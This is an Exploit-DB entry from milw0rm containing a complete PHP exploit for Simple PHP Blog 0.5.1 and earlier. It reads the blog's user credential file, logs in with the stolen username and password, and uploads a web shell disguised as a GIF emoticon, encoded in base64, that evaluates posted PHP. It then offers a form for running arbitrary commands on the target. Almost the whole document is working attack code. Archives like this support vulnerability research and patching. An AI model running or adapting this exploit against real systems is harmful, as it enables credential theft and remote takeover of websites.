Simple PHP Blog SPHPBlog <= 0.5.1 Code Execution Exploit

2008-08-26T00:00:00
ID EDB-ID:6311
Type exploitdb
Reporter mAXzA
Modified 2008-08-26T00:00:00

Description

Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit. Webapps exploit for php platform

                                        
                                            &lt;?
/*
   sIMPLE php bLOG 0.5.0 eXPLOIT
   bY mAXzA 2008
*/
function curl($url,$postvar){
  global $cook;
  $ch = curl_init( $url );
  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($ch, CURLOPT_HEADER, 1);
  curl_setopt ($ch, CURLOPT_REFERER,"$url");
  if (strlen($postvar)&lt;3) $postvar="123";
      curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);
  if (strlen($cook)&gt;3)
      curl_setopt ($ch, CURLOPT_COOKIE, "$cook");
  $res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "&lt;hr&gt;$err&lt;hr&gt;";
  curl_close($ch);
  return $res;
}

function error($msg){
  print "&lt;hr&gt;$msg&lt;hr&gt;\n&lt;h1&gt;Not Exploitable";exit;
}

extract($_POST);extract($_GET);

print "&lt;pre&gt;URL:&lt;form method=post&gt;&lt;input size=80 name=url value=`$url`&gt;";
if (strlen($eval)&gt;3){
   $eval=stripslashes($eval);
   print "\nEnter PHP Command:\n&lt;textarea name=eval rows=10 cols=90&gt;$eval&lt;/textarea&gt;";
   print "&lt;input type=submit value='Eval'&gt;&lt;/form&gt;";
   $res=curl("$url/images/emoticons/sphp.php","z=$eval");
   $res=strstr($res,"GIF89a");
   print substr($res,41);exit;
}

if (strlen($url)&gt;10)
{
  print "\n&lt;hr&gt;Trying to Get /config/users.php...";flush();
  $res=curl($url."/config/users.php","");
  if (strstr($res,'|')) print "Done!\n\n$res";
  else error("\n\nUsername & Password Not Found\n\n$res");

  print "\n&lt;hr&gt;Trying to Get Username & Password...";flush();
  $res=str_replace("\r\n","\n",$res);
  $res=substr($res,strpos($res,"\n\n")+2);
  $line=explode("\n",$res);$n=count($line)-1;
  if ($n) {
  print "\nDone! Found - $n users:\n";
   for ($x=0;$x&lt;$n;$x++){
     $up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);
     print "\nUsername - ".$up[1]."\tPassword - ".$up[2];
   }
  }

  print "\n&lt;hr&gt;Trying to Login...";flush();
  $postvar="user=$user[0]&pass=$pass[0]&";
  $res=curl($url."/login_cgi.php","$postvar");
  $cook=strstr($res,'Set-Cookie: sid=');
  $cook=substr($cook,12,strpos($cook,';')-12);
  if ($cook) print "\n\nDone...  Cookie - $cook";else error("\n&lt;h1&gt;Error To Login&lt;/h1&gt;\n\n\n$res");

  print "\n&lt;hr&gt;Trying to Upload Emoticon...";flush();
  $buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8+Ow==";
  if (@filesize('sphp.php')!=82){
       $f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);
  }
  $f=getcwd()."/sphp.php";
  $res=curl($url."/emoticons.php",array('user_emot'=&gt;"@$f"));
  if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n&lt;h1&gt;Error To Upload&lt;/h1&gt;\n\n\n$res");

  print "\n&lt;hr&gt;Trying to Exploit...";flush();
  $res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");
  if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n&lt;h1&gt;Error To Exploit&lt;/h1&gt;\n\n\n$res");

  print "\n&lt;hr&gt;Trying to Logout...";flush();
  $res=curl($url."/logout.php","");
  if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n&lt;h1&gt;Error To Logout&lt;/h1&gt;\n\n\n$res");
  print "\nEnter PHP Command:\n&lt;textarea name=eval rows=10 cols=90&gt;&lt;/textarea&gt;";
}
print "&lt;input type=submit &gt;&lt;/form&gt;";
?&gt;

# milw0rm.com [2008-08-26]